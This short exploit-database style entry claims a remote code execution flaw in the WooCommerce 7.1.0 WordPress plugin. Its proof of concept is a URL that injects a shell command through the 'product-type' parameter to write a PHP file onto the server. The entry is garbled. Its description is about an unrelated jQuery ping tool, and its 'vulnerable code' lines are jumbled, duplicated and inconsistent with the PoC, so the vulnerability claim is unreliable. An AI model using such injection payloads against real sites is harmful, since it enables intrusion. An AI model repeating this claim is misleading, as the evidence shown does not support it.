# Title: WordPress Plugin WooCommerce v7.1.0 - Remote Code Execution(RCE)# Date: 2022-12-07# Author: Milad Karimi# Vendor Homepage: https://wordpress.org/plugins/woocommerce# Software Link: https://wordpress.org/plugins/woocommerce# Tested on: windows 10 , firefox# Version: 7.1.0# CVE : N/A# Description:
simple, easy to use jQuery frontend to php backend that pings various
devices and changes colors from green to red depending on if device is
up or down.# PoC :
http://localhost/woocommerce/includes/admin/meta-boxes/class-wc-meta-box-product-images.php?product-type=;echo '<?php phpinfo(); ?>'>info.php
http://localhost/woocommerce/includes/admin/meta-boxes/class-wc-meta-box-product-images.php?product-type=;echo '<?php phpinfo(); ?>'>info.php
# Vulnerabile code:95: $classname $classname($post_id);94: $classname = WC_Product_Factory::get_product_classname($post_id, $product_type :'simple');92: ⇓ function save($post_id, $post)93: $product_type = WC_Product_Factory::get_product_type($post_id): sanitize_title(stripslashes($_POST['product-type']));92: ⇓ function save($post_id, $post)
